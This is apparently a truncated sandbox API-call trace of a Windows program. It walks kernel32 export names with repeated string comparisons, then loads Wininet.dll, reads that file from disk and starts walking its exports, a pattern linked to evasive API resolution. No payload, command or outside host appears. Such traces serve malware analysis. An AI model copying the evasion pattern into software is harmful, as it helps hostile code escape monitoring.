[0207.163] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0207.163] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0207.163] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0207.163] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0207.163] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0207.163] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0207.163] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0207.164] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0207.164] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0207.164] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0207.164] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0207.164] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0207.164] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0207.164] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0207.164] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0207.164] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0207.164] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0207.173] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0207.173] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0207.173] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0207.173] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0207.173] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0207.173] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0207.173] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0207.173] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0207.173] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0207.173] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0207.173] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0207.173] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0207.174] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0207.178] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0207.178] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.178] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.178] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.178] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0207.179] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0207.179] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0207.179] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0207.179] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0207.180] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0207.180] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0207.180] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0207.180] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0207.180] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0207.180] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0207.180] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.180] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.183] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.183] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0207.183] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0207.183] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0207.183] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0207.183] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0207.184] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0207.184] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0207.184] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0207.184] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0207.185] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0207.185] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0207.186] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0207.187] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0207.187] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0207.188] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0207.188] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0207.188] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0207.188] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0207.189] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0207.189] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0207.189] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0207.587] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0207.588] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0207.589] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0207.589] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0210.733] GetProcessHeap () returned 0x560000 [0210.733] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x58c5c0 | out: hHeap=0x560000) returned 1 [0210.733] GetProcessHeap () returned 0x560000 [0210.733] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x579070 [0210.733] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0210.746] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0210.746] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0210.746] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0210.746] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0210.746] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0210.746] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0210.746] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0210.746] GetProcessHeap () returned 0x560000 [0210.747] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x286600) returned 0x4173040 [0210.753] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0210.753] ReadFile (in: hFile=0x140, lpBuffer=0x4173040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4173040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0211.891] CloseHandle (hObject=0x140) returned 1 [0211.891] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0211.891] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0211.891] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0211.891] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0211.891] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0211.891] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0211.891] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0211.891] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0211.891] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.891] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0211.891] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0211.891] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0211.892] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0211.892] lstrcmpA (lpString1="AppCacheFinalize", 